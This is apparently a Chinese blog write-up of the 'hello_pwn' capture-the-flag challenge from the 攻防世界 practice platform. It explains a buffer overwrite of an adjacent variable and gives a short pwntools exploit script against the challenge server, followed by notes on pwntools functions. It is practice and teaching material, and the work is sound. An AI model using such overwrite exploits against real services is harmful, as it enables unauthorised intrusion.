攻防世界 | hello_pwn

攻防世界 | hello_pwn
看样子是要让我们通过read(0, &unk_601068, 0x10uLL)，读入 unk_601068 将 dword_60106C 覆盖

6c-68=4,所以：
```
from pwn import *
io = remote("111.198.29.45",45604)
payload = "A"*4
payload += p64(1853186401)
io.sendline(payload)
io.interactive()
```
PS：

ASCII码：
- 一个英文字母（不分大小写）占一个字节的空间
db：
- 定义字节类型变量，一个字节数据占1个字节单元，读完一个，偏移量加1
PwnTools中的主要IO函数：
- sendline(data) : 发送一行数据，相当于在末尾加
- interactive() : 与shell交互
连接
- 远程：sh = remote("127.0.0.1",10001)
- 关闭连接：sh.close()
参考：

https://www.cnblogs.com/Ox9A82/p/5728149.html

http://brieflyx.me/2015/python-module/pwntools-intro/

https://pwntoolsdocinzh-cn.readthedocs.io/en/master/intro.html
相关阅读:
BZOJ3585&3339mex——主席树
 BZOJ1926[Sdoi2010]粟粟的书架——二分答案+主席树
 BZOJ2662[BeiJing wc2012]冻结——分层图最短路
 BZOJ1433[ZJOI2009]假期的宿舍——二分图最大匹配
 BZOJ1087[SCOI2005]互不侵犯——状压DP
BZOJ4808马——二分图最大独立集
 BZOJ3175[Tjoi2013]攻击装置——二分图最大独立集
 BZOJ3524[Poi2014]Couriers——主席树
 BZOJ4010[HNOI2015]菜肴制作——拓扑排序+堆
 BZOJ2588Count on a tree——LCA+主席树
原文地址：https://www.cnblogs.com/chrysanthemum/p/11764423.html